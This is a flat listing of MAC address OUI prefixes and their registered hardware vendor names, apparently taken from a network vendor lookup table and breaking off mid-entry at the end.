HeiSei Electronics 00018B NetLinks Co., Ltd. 00018D AudeSi Technologies 00019D E-Control Systems, Inc. 0001CE Custom Micro Products, Ltd. 0001BB Frequentis 0001BC Brains Corporation 0001C0 CompuLab, Ltd. 00017C AG-E GmbH 000108 AVLAB Technology, Inc. 00062B INTRASERVER TECHNOLOGY 000100 EQUIP'TRANS 00B09D Point Grey Research Inc. 000110 Gotham Networks 000112 Shark Multimedia Inc. 000116 Netspect Technologies, Inc. 00B06D Jones Futurex Inc. 00B094 Alaris, Inc. 0030F0 Uniform Industrial Corp. 00013B BNA SYSTEMS 000134 Selectron Systems AG 000139 Point Multimedia Systems 00013E Ascom Tateco AB 00012E PC Partner Ltd. 000132 Dranetz - BMI 000113 OLYMPUS CORPORATION 00011E Precidia Technologies, Inc. 000155 Promise Technology, Inc. 003094 Cisco Systems, Inc 00308A NICOTRA SISTEMI S.P.A 003072 Intellibyte Inc. 003040 Cisco Systems, Inc 003032 MagicRam, Inc. 0030EA TeraForce Technology Corporation 00309B Smartware 003045 Village Networks, Inc. (VNI) 0030E5 Amper Datos S.A. 003006 SUPERPOWER COMPUTER 003038 XCP, INC. 003079 CQOS, INC. 00300C CONGRUENCY, LTD. 00304C APPIAN COMMUNICATIONS, INC. 0030E8 ENSIM CORP. 0030C9 LuxN, N 003028 FASE Saldatura srl 003069 IMPACCT TECHNOLOGY CORP. 0030C3 FLUECKIGER ELEKTRONIK AG 00305A TELGEN CORPORATION 003010 VISIONETICS INTERNATIONAL 0030D9 DATACORE SOFTWARE CORP. 003026 HeiTel Digital Video GmbH 003077 ONPREM NETWORKS 003047 NISSEI ELECTRIC CO., LTD. 0030D4 AAE Systems, Inc. 00D0D7 B2C2, INC. 00D073 ACN ADVANCED COMMUNICATIONS 00D057 ULTRAK, INC. 0030AB DELTA NETWORKS, INC. 003049 BRYANT TECHNOLOGY, LTD. 00306D LUCENT TECHNOLOGIES 003017 BlueArc UK Ltd 00301C ALTVATER AIRDATA SYSTEMS 003080 Cisco Systems, Inc 0030F7 RAMIX INC. 0030D0 Tellabs 003014 DIVIO, INC. 003081 ALTOS C&C 00D0F0 CONVISION TECHNOLOGY GMBH 00D010 CONVERGENT NETWORKS, INC. 00D04B LA CIE GROUP S.A. 00D00E PLURIS, INC. 00D012 GATEWORKS CORP. 00D04D DIV OF RESEARCH & STATISTICS 00D02E COMMUNICATION AUTOMATION CORP. 00D0C5 COMPUTATIONAL SYSTEMS, INC. 00D046 DOLBY LABORATORIES, INC. 00D0DE PHILIPS MULTIMEDIA NETWORK 00D00C SNIJDER MICRO SYSTEMS 00D017 SYNTECH INFORMATION CO., LTD. 00D036 TECHNOLOGY ATLANTA CORP. 00D0E3 ELE-CHEM ENGINEERING CO., LTD. 00D0B6 CRESCENT NETWORKS, INC. 00D0C4 TERATECH CORPORATION 00D061 TREMON ENTERPRISES CO., LTD. 00D0E5 SOLIDUM SYSTEMS CORP. 00D045 KVASER AB 00D004 PENTACOM LTD. 00D005 ZHS ZEITMANAGEMENTSYSTEME 00D0D3 Cisco Systems, Inc 00D026 HIRSCHMANN AUSTRIA GMBH 00D0DA TAICOM DATA SYSTEMS CO., LTD. 00D03C Vieo, Inc. 00D0B4 KATSUJIMA CO., LTD. 00D086 FOVEON, INC. 00D0A8 NETWORK ENGINES, INC. 00D0AB DELTAKABEL TELECOM CV 00D0E8 MAC SYSTEM CO., LTD. 00D06B SR TELECOM INC. 00D0DC MODULAR MINING SYSTEMS, INC. 00D01E PINGTEL CORP. 00D0CA Intrinsyc Software International Inc. 00D065 TOKO ELECTRIC 00D09A FILANET CORPORATION 00D0AE ORESIS COMMUNICATIONS, INC. 00D0F2 MONTEREY NETWORKS 00D014 ROOT, INC. 00D023 INFORTREND TECHNOLOGY, INC. 00D0A2 INTEGRATED DEVICE 00D034 ORMEC SYSTEMS CORP. 00D08A PHOTRON USA 00D0A7 TOKYO SOKKI KENKYUJO CO., LTD. 00D01D FURUNO ELECTRIC CO., LTD. 00504C Galil Motion Control 005076 IBM Corp 0050D4 JOOHONG INFORMATION & 0050A6 OPTRONICS 0050A9 MOLDAT WIRELESS TECHNOLGIES 00509B SWITCHCORE AB 00507E NEWER TECHNOLOGY 0050CE LG INTERNATIONAL CORP. 0050F7 VENTURE MANUFACTURING (SINGAPORE) LTD. 005019 SPRING TIDE NETWORKS, INC. 0050FD VISIONCOMM CO., LTD. 0050BF Metalligence Technology Corp. 005036 NETCAM, LTD. 0050DB CONTEMPORARY CONTROL 00507C VIDEOCON AG 005047 Private 00D06C SHAREWAVE, INC. 0050A7 Cisco Systems, Inc 005055 DOMS A/S 005072 CORVIS CORPORATION 00D0EE DICTAPHONE CORPORATION 00501B ABL CANADA, INC. 009057 AANetcom, Inc. 009083 TURBO COMMUNICATION, INC. 00903D BIOPAC SYSTEMS, INC. 0090D7 NetBoost Corp. 005083 GILBARCO, INC. 0050DC TAS TELEFONBAU A. SCHWABE GMBH & CO. KG 005008 TIVA MICROCOMPUTER CORP. (TMC) 005052 TIARA NETWORKS, INC. 005027 GENICOM CORPORATION 00505A NETWORK ALCHEMY, INC. 005039 MARINER NETWORKS 005064 CAE ELECTRONICS 0050B8 INOVA COMPUTERS GMBH & CO. KG 00505B KAWASAKI LSI U.S.A., INC. 0050CC Seagate Cloud Systems Inc 005016 Molex Canada Ltd 00501F MRG SYSTEMS, LTD. 005043 MARVELL SEMICONDUCTOR, INC. 005095 PERACOM NETWORKS 0050FA OXTEL, LTD. 009038 FOUNTAIN TECHNOLOGIES, INC. 0090B0 VADEM 0090EF INTEGRIX, INC. 0090C5 INTERNET MAGIC, INC. 00908C ETREND ELECTRONICS, INC. 009048 ZEAL CORPORATION 0090B9 BERAN INSTRUMENTS LTD. 0090C4 JAVELIN SYSTEMS, INC. 0090A5 SPECTRA LOGIC 0090A3 Corecess Inc. 009082 FORCE INSTITUTE 009000 DIAMOND MULTIMEDIA 00906E PRAXON, INC. 009054 INNOVATIVE SEMICONDUCTORS, INC 009061 PACIFIC RESEARCH & ENGINEERING CORPORATION 00900B LANNER ELECTRONICS, INC. 0090CEavateramedical Mechatronics GmbH 009007 DOMEX TECHNOLOGY CORP. 00902D DATA ELECTRONICS (AUST.) PTY, LTD. 0090D4 BindView Development Corp. 009029 CRYPTO AG 0090DF MITSUBISHI CHEMICAL AMERICA, INC. 0090C0 K.J. LAW ENGINEERS, INC. 00901F ADTEC PRODUCTIONS, INC. 009024 PIPELINKS, INC. 00903A NIHON MEDIA TOOL INC. 0090B2 AVICI SYSTEMS INC. 0090B6 FIBEX SYSTEMS 009063 COHERENT COMMUNICATIONS SYSTEMS CORPORATION 009062 ICP VORTEX COMPUTERSYSTEME GmbH 0010D3 GRIPS ELECTRONIC GMBH 0010FB ZIDA TECHNOLOGIES LIMITED 001053 COMPUTER TECHNOLOGY CORP. 0010ED SUNDANCE TECHNOLOGY, INC. 00106C EDNT GmbH 0010E9 RAIDTEC LTD. 001003 IMATRON, INC. 001071 ADVANET INC. 009015 CENTIGRAM COMMUNICATIONS CORP. 009095 UNIVERSAL AVIONICS 009041 APPLIED DIGITAL ACCESS 00905A DEARBORN GROUP, INC. 009011 WAVTrace, Inc. 009065 FINISAR CORPORATION 009023 ZILOG INC. 0090F6 ESCALATE NETWORKS, INC. 0090A8 NineTiles Networks, Ltd. 00102A ZF MICROSYSTEMS, INC. 0010E5 SOLECTRON TEXAS 00109D CLARINET SYSTEMS, INC. 00100E MICRO LINEAR COPORATION 0090EC PYRESCOM 0090C3 TOPIC SEMICONDUCTOR CORP. 0010C8 COMMUNICATIONS ELECTRONICS SECURITY GROUP 0010F3 Nexcom International Co., Ltd. 001086 ATTO Technology, Inc. 0010DF RISE COMPUTER INC. 001072 GVN TECHNOLOGIES, INC. 0010DA Kollmorgen Corp 0010E4 NSI CORPORATION 00107E BACHMANN ELECTRONIC GmbH 0010A0 INNOVEX TECHNOLOGIES, INC. 001016 T.SQWARE 001090 CIMETRICS, INC. 0010F5 AMHERST SYSTEMS, INC. 00103D PHASECOM, LTD. 001096 TRACEWELL SYSTEMS, INC. 001082 JNA TELECOMMUNICATIONS LIMITED 001098 STARNET TECHNOLOGIES, INC. 001042 Alacritech, Inc. 001068 COMOS TELECOM 0010EA ADEPT TECHNOLOGY 0010AE SHINKO ELECTRIC INDUSTRIES CO. 0010C4 MEDIA GLOBAL LINKS CO., LTD. 0010FE DIGITAL EQUIPMENT CORPORATION 001056 SODICK CO., LTD. 0010CD INTERFACE CONCEPT 001061 HOSTLINK CORP. 001099 InnoMedia, Inc. 0010E1 S.I. TECH, INC. 0010BB DATA & INFORMATION TECHNOLOGY 001020 Hand Held Products Inc 00103A DIAMOND NETWORK TECH 001004 THE BRANTLEY COILE COMPANY,INC 0010EF DBTEL INCORPORATED 001088 AMERICAN NETWORKS INC. 001022 SatCom Media Corporation 001076 EUREM GmbH 00103F TOLLGRADE COMMUNICATIONS, INC. 001049 ShoreTel, Inc 00105E Spirent plc, Service Assurance Broadband 0010AF TAC SYSTEMS, INC. 00108C Fujitsu Services Ltd 0010F7 IRIICHI TECHNOLOGIES Inc. 0010AB KOITO ELECTRIC INDUSTRIES, LTD. 001010 INITIO CORPORATION 0010F2 ANTEC 00E007 Avaya ECS Ltd 0010BE MARCH NETWORKS CORPORATION 001058 ArrowPoint Communications 00100F INDUSTRIAL CPU SYSTEMS 0010BC Aastra Telecom 00E0BF TORRENT NETWORKING TECHNOLOGIES CORP. 00E0E3 SK-ELEKTRONIK GMBH 00E0C6 LINK2IT, L.L.C. 00E0E5 CINCO NETWORKS, INC. 00E061 EdgePoint Networks, Inc. 00E053 CELLPORT LABS, INC. 00E0D3 DATENTECHNIK GmbH 00E043 VitalCom 00E0B3 EtherWAN Systems, Inc. 00E0ED SILICOM, LTD. 00E0B8 GATEWAY 2000 00E07C METTLER-TOLEDO, INC. 00E026 Redlake MASD LLC 00E020 TECNOMEN OY 00E00D RADIANT SYSTEMS 00E0DC NEXWARE CORP. 00E037 CENTURY CORPORATION 00E0C2 NECSY S.p.A. 00E0FB LEIGHTRONIX, INC. 00E09B ENGAGE NETWORKS, INC. 00E045 TOUCHWAVE, INC. 00E040 DeskStation Technology, Inc. 00E01A COMTEC SYSTEMS. CO., LTD. 00E078 BERKELEY NETWORKS 00E087 LeCroy - Networking Productions Division 00E041 CSPI 00E0E2 INNOVA CORP. 00E081 TYAN COMPUTER CORP. 00E057 HAN MICROTELECOM. CO., LTD. 00E0BC SYMON COMMUNICATIONS, INC. 00E082 ANERMA 00E077 WEBGEAR, INC. 00E056 HOLONTECH CORPORATION 00E031 HAGIWARA ELECTRIC CO., LTD. 00E00B ROOFTOP COMMUNICATIONS CORP. 00E0B2 TELMAX COMMUNICATIONS CORP. 00E02F MCNS HOLDINGS, L.P. 00E07E WALT DISNEY IMAGINEERING 00E099 SAMSON AG 0060AE TRIO INFORMATION SYSTEMS AB 006053 TOYODA MACHINE WORKS, LTD. 006056 NETWORK TOOLS, INC. 00600C Eurotech Inc. 00601C TELXON CORPORATION 00605F NIPPON UNISOFT CORPORATION 006091 FIRST PACIFIC NETWORKS, INC. 00601D LUCENT TECHNOLOGIES 00607B FORE SYSTEMS, INC. 00E06C Ultra Electronics Command & Control Systems 00E04A ZX Technologies, Inc 0060C9 ControlNet, Inc. 00E07A MIKRODIDAKT AB 006032 I-CUBE, INC. 006033 ACUITY IMAGING, INC. 006013 NETSTAL MASCHINEN AG 006022 VICOM SYSTEMS, INC. 0060EE APOLLO 0060D8 ELMIC SYSTEMS, INC. 0060EF FLYTECH TECHNOLOGY CO., LTD. 006085 Storage Concepts 006011 CRYSTAL SEMICONDUCTOR CORP. 0060F5 ICON WEST, INC. 006062 TELESYNC, INC. 0060E9 ATOP TECHNOLOGIES, INC. 006043 iDirect, INC. 006028 MACROVISION CORPORATION 0060F0 JOHNSON & JOHNSON MEDICAL, INC 0060E0 AXIOM TECHNOLOGY CO., LTD. 006096 T.S. MICROTECH INC. 00603A QUICK CONTROLS LTD. 000288 GLOBAL VILLAGE COMMUNICATION 006034 ROBERT BOSCH GmbH 006050 INTERNIX INC. 0060FA EDUCATIONAL TECHNOLOGY RESOURCES, INC. 0060DA Red Lion Controls, LP 0060E4 COMPUSERVE, INC. 00608F TEKRAM TECHNOLOGY CO., LTD. 0060C4 SOLITON SYSTEMS K.K. 00A03C EG&G NUCLEAR INSTRUMENTS 00A0C4 CRISTIE ELECTRONICS LTD. 00A063 JRL SYSTEMS, INC. 00A02C interWAVE Communications 00A0F7 V.I COMPUTER CORP. 00A090 TimeStep Corporation 00A0EA ETHERCOM CORP. 00A0DC O.N. ELECTRONIC CO., LTD. 00A00B COMPUTEX CO., LTD. 00A0E2 Keisokugiken Corporation 00A033 imc MeBsysteme GmbH 00A0A9 NAVTEL COMMUNICATIONS INC. 00A071 VIDEO LOTTERY TECHNOLOGIES,INC 006000 XYCOM INC. 006045 PATHLIGHT TECHNOLOGIES 00A05D CS COMPUTER SYSTEME GmbH 00A061 PURITAN BENNETT 0060A6 PARTICLE MEASURING SYSTEMS 00602A SYMICRON COMPUTER COMMUNICATIONS, LTD. 00A06D MANNESMANN TALLY CORPORATION 00A0F6 AutoGas Systems Inc. 0060BE WEBTRONICS 0060BF MACRAIGOR SYSTEMS, INC. 006080 MICROTRONIX DATACOM LTD. 00A037 Mindray DS USA, Inc. 00A04C INNOVATIVE SYSTEMS & TECHNOLOGIES, INC. 00A031 HAZELTINE CORPORATION, MS 1-17 00A041 INFICON 00A0A7 VORAX CORPORATION 00A07E AVID TECHNOLOGY, INC. 00A06F Color Sentinel Systems, LLC 00A0C7 TADIRAN TELECOMMUNICATIONS 00A01A BINAR ELEKTRONIK AB 00A088 ESSENTIAL COMMUNICATIONS 00A0C2 R.A. SYSTEMS CO., LTD. 00A098 NetApp 00A04B TFL LAN INC. 00A064 KVB/ANALECT 00A03E ATM FORUM 00A01F TRICORD SYSTEMS, INC. 00A0FB TORAY ENGINEERING CO., LTD. 00A06C SHINDENGEN ELECTRIC MFG. CO., LTD. 00A0DB FISHER & PAYKEL PRODUCTION 00A081 ALCATEL DATA NETWORKS 00A0B1 FIRST VIRTUAL CORPORATION 002010 JEOL SYSTEM TECHNOLOGY CO. LTD 00209F MERCURY COMPUTER SYSTEMS, INC. 00A073 COM21, INC. 00A03A KUBOTEK CORPORATION 00A0B2 SHIMA SEIKI 00A08B ASTON ELECTRONIC DESIGNS LTD. 00A097 JC INFORMATION SYSTEMS 00A027 FIREPOWER SYSTEMS, INC. 00A046 SCITEX CORP. LTD. 00A0D4 RADIOLAN,INC. 00A092 H. BOLLMANN MANUFACTURERS, LTD 00200D CARL ZEISS 00202D TAIYO CORPORATION 002091 J125, NATIONAL SECURITY AGENCY 0020BD NIOBRARA R & D CORPORATION 002054 Sycamore Networks 0020A7 PAIRGAIN TECHNOLOGIES, INC. 002055 ALTECH CO., LTD. 00200A SOURCE-COMM CORP. 0020CF TEST & MEASUREMENT SYSTEMS INC 0020B4 TERMA ELEKTRONIK AS 0020E4 HSING TECH ENTERPRISE CO., LTD 00206C EVERGREEN TECHNOLOGY CORP. 00205E CASTLE ROCK, INC. 002012 CAMTRONICS MEDICAL SYSTEMS 002075 MOTOROLA COMMUNICATION ISRAEL 0020A5 API ENGINEERING 002064 PROTEC MICROSYSTEMS, INC. 002033 SYNAPSE TECHNOLOGIES, INC. 0020CB PRETEC ELECTRONICS CORP. 0020EB CINCINNATI MICROWAVE, INC. 0020A0 OA LABORATORY CO., LTD. 0020E2 INFORMATION RESOURCE ENGINEERING 002007 SFA, INC. 00205C InterNet Systems of Florida, Inc. 0020A2 GALCOM NETWORKING LTD. 002031 Tattile SRL 0020D0 VERSALYNX CORPORATION 0020B9 METRICOM, INC. 002039 SCINETS 002072 WORKLINK INNOVATIONS 0020EC TECHWARE SYSTEMS CORP. 00206E XACT, INC. 0020F1 ALTOS INDIA LIMITED 002041 DATA NET 002076 REUDO CORPORATION 0020E8 DATATREK CORPORATION 0020C5 EAGLE TECHNOLOGY 002009 PACKARD BELL ELEC., INC. 002027 MING FORTUNE INDUSTRY CO., LTD 00208A SONIX COMMUNICATIONS, LTD. 0020D2 RAD DATA COMMUNICATIONS, LTD. 002002 SERITECH ENTERPRISE CO., LTD. 00204B AUTOCOMPUTER CO., LTD. 0020EA EFFICIENT NETWORKS, INC. 00206A OSAKA COMPUTER CORP. 0020DB XNET TECHNOLOGY, INC. 0020BB ZAX CORPORATION 0020A8 SAST TECHNOLOGY CORP. 002045 ION Networks, Inc. 002049 COMTRON, INC. 002050 KOREA COMPUTER INC. 002084 OCE PRINTING SYSTEMS, GMBH 00208C GALAXY NETWORKS, INC. 00202C WELLTRONIX CO., LTD. 002021 ALGORITHMS SOFTWARE PVT. LTD. 00C0F9 Artesyn Embedded Technologies 00C075 XANTE CORPORATION 001C7C PERQ SYSTEMS CORPORATION 00C039 Teridian Semiconductor Corporation 00C0A9 BARRON MCCANN LTD. 00C04B CREATIVE MICROSYSTEMS 00C0B9 FUNK SOFTWARE, INC. 00C015 NEW MEDIA CORPORATION 00C083 TRACE MOUNTAIN PRODUCTS, INC. 00C094 VMX INC. 00C019 LEAP TECHNOLOGY, INC. 00C0CF IMATRAN VOIMA OY 00C07D RISC DEVELOPMENTS LTD. 00C043 STRATACOM 00C0B5 CORPORATE NETWORK SYSTEMS,INC. 00C0ED US ARMY ELECTRONIC 00C032 I-CUBED LIMITED 00C0A5 DICKENS DATA SYSTEMS 00C0EF ABIT CORPORATION 00C061 SOLECTEK CORPORATION 00C0AD MARBEN COMMUNICATION SYSTEMS 00C07F NUPON COMPUTING CORP. 00C057 MYCO ELECTRONICS 00C056 SOMELEC 00C027 CIPHER SYSTEMS, INC. 00C05C ELONEX PLC 00C028 JASCO CORPORATION 00C08D TRONIX PRODUCT DEVELOPMENT 00C02A OHKURA ELECTRIC CO., LTD. 00C0FC ELASTIC REALITY, INC. 00C0BB FORVAL CREATIVE, INC. 00C0E0 DSC COMMUNICATION CORP. 00C05B NETWORKS NORTHWEST, INC. 00C008 SECO SRL 00C0B7 AMERICAN POWER CONVERSION CORP 00C0D3 OLYMPUS IMAGE SYSTEMS, INC. 00C0E8 PLEXCOM, INC. 00C0DA NICE SYSTEMS LTD. 00C0D1 COMTREE TECHNOLOGY CORPORATION 00C038 RASTER IMAGE PROCESSING SYSTEM 00409B HAL COMPUTER SYSTEMS INC. 0040EB MARTIN MARIETTA CORPORATION 0040BD STARLIGHT NETWORKS, INC. 0040ED NETWORK CONTROLS INT'NATL INC. 004021 RASTER GRAPHICS 0040C1 BIZERBA-WERKE WILHEIM KRAUT 0040E1 MARNER INTERNATIONAL, INC. 0040FE SYMPLEX COMMUNICATIONS 0040E5 SYBUS CORPORATION 0040A5 CLINICOMP INTL. 004005 ANI COMMUNICATIONS INC. 0040D9 AMERICAN MEGATRENDS INC. 00404C HYPERTEC PTY LTD. 00C030 INTEGRATED ENGINEERING B. V. 00C0A6 EXICOM AUSTRALIA PTY. LTD 00C0CB CONTROL TECHNOLOGY CORPORATION 00C0EB SEH COMPUTERTECHNIK GMBH 0040DB ADVANCED TECHNICAL SOLUTIONS 00C092 MENNEN MEDICAL INC. 00C052 BURR-BROWN 00400E MEMOTEC, INC. 00C03D WIESEMANN & THEIS GMBH 0040C8 MILAN TECHNOLOGY CORPORATION 0040BA ALLIANT COMPUTER SYSTEMS CORP. 004038 TALENT ELECTRIC INCORPORATED 0040D8 OCEAN OFFICE AUTOMATION LTD. 004088 MOBIUS TECHNOLOGIES, INC. 004032 DIGITAL COMMUNICATIONS 0040C2 APPLIED COMPUTING DEVICES 0040D4 GAGE TALKER CORP. 0040CE NET-SOURCE, INC. 004062 E-SYSTEMS, INC./GARLAND DIV. 004034 BUSTEK CORPORATION 00401C AST RESEARCH, INC. 00400F DATACOM TECHNOLOGIES 004006 SAMPO TECHNOLOGY CORPORATION 0080AA MAXPEED 00C050 TOYO DENKI SEIZO K.K. 0040C6 FIBERNET RESEARCH, INC. 004047 WIND RIVER SYSTEMS 004050 IRONICS, INCORPORATED 008092 Silex Technology, Inc. 008093 XYRON CORPORATION 00805A TULIP COMPUTERS INTERNAT'L B.V 004041 FUJIKURA LTD. 00804E APEX COMPUTER COMPANY 008055 FERMILAB 00802A TEST SYSTEMS & SIMULATIONS INC 008035 TECHNOLOGY WORKS, INC. 00807E SOUTHERN PACIFIC LTD. 0080EF RATIONAL 0080F0 Panasonic Communications Co., Ltd. 00801D INTEGRATED INFERENCE MACHINES 008075 PARSYTEC GMBH 008051 FIBERMUX 0080C6 NATIONAL DATACOMM CORPORATION 0080C0 PENRIL DATACOMM 00802E CASTLE ROCK COMPUTING 0080F2 RAYCOM SYSTEMS INC 0080BD THE FURUKAWA ELECTRIC CO., LTD 008025 Telit Wireless Solutions GmbH 0080EA ADVA Optical Networking Ltd. 00001E TELSIST INDUSTRIA ELECTRONICA 000050 RADISYS CORPORATION 008004 ANTLOW COMMUNICATIONS, LTD. 0080D0 COMPUTER PERIPHERALS, INC. 008024 KALPANA, INC. 008040 JOHN FLUKE MANUFACTURING CO. 008021 Alcatel Canada Inc. 0080E8 CUMULUS CORPORATIION 008069 COMPUTONE SYSTEMS 00800D VOSSWINKEL F.U. 0080D1 KIMTRON CORPORATION 008042 Artesyn Embedded Technologies 00809A NOVUS NETWORKS LTD 008000 MULTITECH SYSTEMS, INC. 0080ED IQ TECHNOLOGIES, INC. 00804A PRO-LOG 000066 TALARIS SYSTEMS, INC. 000049 APRICOT COMPUTERS, LTD 0000FA MICROSAGE COMPUTER SYSTEMS INC 0000D4 PURE DATA LTD. 000019 APPLIED DYNAMICS INTERNATIONAL 000015 DATAPOINT CORPORATION 00001C BELL TECHNOLOGIES 000034 NETWORK RESOURCES CORPORATION 000022 VISUAL TECHNOLOGY INC. 0000B5 DATABILITY SOFTWARE SYS. INC. 00002F TIMEPLEX INC. 0000B8 SEIKOSHA CO., LTD. 0000E6 APTOR PRODUITS DE COMM INDUST 000084 SUPERNET 00009A RC COMPUTER A/S 000027 JAPAN RADIO COMPANY 0000E8 ACCTON TECHNOLOGY CORP. 00004B ICL DATA OY 0000E0 QUADRAM CORP. 0000AB LOGIC MODELING CORPORATION 0080AC IMLOGIX, DIVISION OF GENESYS 00004F LOGICRAFT, INC. 00006F Madge Ltd. 000078 LABTAM LIMITED 00005A SysKonnect GmbH 00005B ELTEC ELEKTRONIK AG 000071 ADRA SYSTEMS INC. 000073 SIECOR CORPORATION 0000B9 MCDONNELL DOUGLAS COMPUTER SYS 0000BF SYMMETRIC COMPUTER SYSTEMS 00002D CHROMATICS INC 000018 WEBSTER COMPUTER CORPORATION 0000C8 ALTOS COMPUTER SYSTEMS 0000D5 MICROGNOSIS INTERNATIONAL 00003A CHYRON CORPORATION 000059 Hellige GMBH 000069 CONCORD COMMUNICATIONS INC 0000E7 Star Gate Technologies 00004D DCI CORPORATION 000023 ABB INDUSTRIAL SYSTEMS AB 0000BE THE NTI GROUP 0000D9 NIPPON TELEGRAPH & TELEPHONE 000080 CRAY COMMUNICATIONS A/S 08002A MOSAIC TECHNOLOGIES INC. 080089 Kinetics 080086 KONICA MINOLTA HOLDINGS, INC. 080083 Seiko Instruments Inc. 080061 JAROGATE LTD. 08005F SABER TECHNOLOGY CORP. 080058 SYSTEMS CONCEPTS 080049 UNIVATION 080024 10NET COMMUNICATIONS/DCA 080022 NBI INC. 080020 Oracle Corporation 08001F SHARP CORPORATION 080014 EXCELAN AA0000 DIGITAL EQUIPMENT CORPORATION AA0001 DIGITAL EQUIPMENT CORPORATION AA0002 DIGITAL EQUIPMENT CORPORATION 000007 XEROX CORPORATION 00801F KRUPP ATLAS ELECTRONIK GMBH 080006 SIEMENS AG 04E0C4 TRIUMPH-ADLER AG 020701 RACAL-DATACOM 080013 Exxon 00DD08 UNGERMANN-BASS INC. 000005 XEROX CORPORATION 021C7C PERQ SYSTEMS CORPORATION 080065 GENRAD INC. 84A9EA Career Technologies USA E405F8 Delta Innovation Technology Co., Ltd. 000009 XEROX CORPORATION 0080E9 Madge Ltd. 0040D6 LOCAMATION B.V. 08004B Planning Research Corp. 02AA3C OLIVETTI TELECOMM SPA (OLTECO) 080059 A/S MYCRON 080008 BOLT BERANEK AND NEWMAN INC. F47488 New H3C Technologies Co., Ltd FCC233 ASUSTek COMPUTER INC. 401175 IEEE Registration Authority 8031F0 Samsung Electronics Co.,Ltd 583526 DEEPLET TECHNOLOGY CORP 34B5A3 CIG SHANGHAI CO LTD 6C1DEB u-blox AG 2852F9 Zhongxin Intelligent Times (Shenzhen) Co., Ltd. B8F853 Arcadyan Corporation E0D083 Samsung Electronics Co.,Ltd 743C18 Taicang T&W Electronics 4C80BA Wuhan Tianyu Information Industry Co., Ltd. 8C02FA COMMANDO Networks Limited F0264C Sigrist-Photometer AG D03D52 Vaion Limited D80B9A Samsung Electronics Co.,Ltd AC8D34 HUAWEI TECHNOLOGIES CO.,LTD 645299 The Chamberlain Group, Inc F875A4 LCFC(HeFei) Electronics Technology co., ltd 00D2B1 TPV Display Technology (Xiamen) Co.,Ltd. C0E434 AzureWave Technology Inc. 6C710D Cisco Systems, Inc 246F8C Huawei Device Co., Ltd. 1C1386 Huawei Device Co., Ltd. BC2EF6 Huawei Device Co., Ltd. 4455C4 Huawei Device Co., Ltd. 000829 TOKYO ELECTRON DEVICE NAGASAKI LIMITED 1C4455 Sieb & Meyer AG F88A5E Texas Instruments 5CE7A0 Nokia E01F88 Xiaomi Communications Co Ltd 8CDC02 zte corporation B4BC7C Texas Instruments E0AAB0 SUNTAILI ENTERPRISE CO. LTD, 683943 ittim 10C65E Adapt-IP 7CA7B0 SHENZHEN BILIAN ELECTRONIC CO.,LTD 20311C vivo Mobile Communication Co., Ltd. 104F58 Aruba, a Hewlett Packard Enterprise Company B4E842 Hong Kong Bouffalo Lab Limited 0003CB SystemGear Co., Ltd. F0A7B2 FUTABA CORPORATION 609B2D JMACS Japan Co., Ltd. 14A32F Huawei Device Co., Ltd. 04D3B5 Huawei Device Co., Ltd. 00BB1C Huawei Device Co., Ltd. 80AC7C Sichuan AI-Link Technology Co., Ltd. DC4BFE Shenzhen Belon Technology CO.,LTD 506255 IEEE Registration Authority 58D50A Murata Manufacturing Co., Ltd. 88A303 Samsung Electronics Co.,Ltd FCDE90 Samsung Electronics Co.,Ltd 1854CF Samsung Electronics Co.,Ltd 80795D Infinix mobility limited E884C6 HUAWEI TECHNOLOGIES CO.,LTD 642CAC HUAWEI TECHNOLOGIES CO.,LTD 08CC27 Motorola Mobility LLC, a Lenovo Company 04D395 Motorola Mobility LLC, a Lenovo Company E09806 Espressif Inc. F4CFA2 Espressif Inc. F81E6F EBG compleo GmbH F0A35A Apple, Inc. 608373 Apple, Inc. 84AD8D Apple, Inc. 74428B Apple, Inc. 149138 Amazon Technologies Inc. 6C410E Cisco Systems, Inc 6C310E Cisco Systems, Inc 2877F1 Apple, Inc. A8E77D Texas Instruments DC543D ITEL MOBILE LIMITED 0C8447 Fiberhome Telecommunication Technologies Co.,LTD 9C6B72 Realme Chongqing MobileTelecommunications Corp Ltd 50C6AD Fiberhome Telecommunication Technologies Co.,LTD 748A28 HMD Global Oy D42493 GW Technologies Co.,Ltd 0023E6 Innovation Farm, Inc. ECA940 ARRIS Group, Inc. FC8596 Axonne Inc. 5CB4E2 Inspur Software Group Ltd. 3C510E Cisco Systems, Inc D8AED0 Shanghai Engineering Science & Technology Co.,LTD CGNPC E0859A SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 0C42A1 Mellanox Technologies, Inc. B47AF1 Hewlett Packard Enterprise 349F7B CANON INC. F4D9C6 UNIONMAN TECHNOLOGY CO.,LTD 34F150 Hui Zhou Gaoshengda Technology Co.,LTD CC5289 SHENZHEN OPTFOCUS TECHNOLOGY.,LTD CC5D78 JTD Consulting BCF9F2 TEKO 000EA4 Quantum Corp. 005084 Quantum Corp. 809F9B Sichuan AI-Link Technology Co., Ltd. A82BCD HUAWEI TECHNOLOGIES CO.,LTD 48DC2D HUAWEI TECHNOLOGIES CO.,LTD ACEB51 Universal Electronics, Inc. 6010A2 Crompton Instruments C4B239 Cisco Systems, Inc B0A454 Tripwire Inc. 6490C1 Beijing Xiaomi Mobile Software Co., Ltd CC5CDE China Mobile Group Device Co.,Ltd. 60CE86 Sercomm Corporation. 4C4FEE OnePlus Technology (Shenzhen) Co., Ltd 4CE175 Cisco Systems, Inc A824B8 Nokia 000CE6 Fortinet Inc. 9055DE Fiberhome Telecommunication Technologies Co.,LTD E8910F Fiberhome Telecommunication Technologies Co.,LTD D005E4 Huawei Device Co., Ltd. 30AAE4 Huawei Device Co., Ltd. 14AB56 WUXI FUNIDE DIGITAL CO.,LTD E8D8D1 HP Inc. 28CDC4 CHONGQING FUGUI ELECTRONICS CO.,LTD. 000CDF JAI Manufacturing 2C91AB AVM Audiovisuelles Marketing und Computersysteme GmbH 807B3E Samsung Electronics Co.,Ltd F8F1E6 Samsung Electronics Co.,Ltd 88A9B7 Apple, Inc. ECCED7 Apple, Inc. 48EB62 Murata Manufacturing Co., Ltd. 5CE176 Cisco Systems, Inc AC9085 Apple, Inc. 3448ED Dell Inc. 3C5731 Cisco Systems, Inc 6C55E8 Technicolor CH USA Inc. 342FBD Nintendo Co.,Ltd A02D13 AirTies Wireless Networks 8468C8 TOTOLINK TECHNOLOGY INT‘L LIMITED 9C28F7 Xiaomi Communications Co Ltd 10521C Espressif Inc. 6C42AB Subscriber Networks, Inc. 64F6F7 Anhui Dynamic Power Co., Ltd. 941C56 Actiontec Electronics, Inc D80BCB Telink Semiconductor (Shanghai) Co., Ltd. F0F0A4 Amazon Technologies Inc. C0D682 Arista Networks CC2D1B SFR 80E540 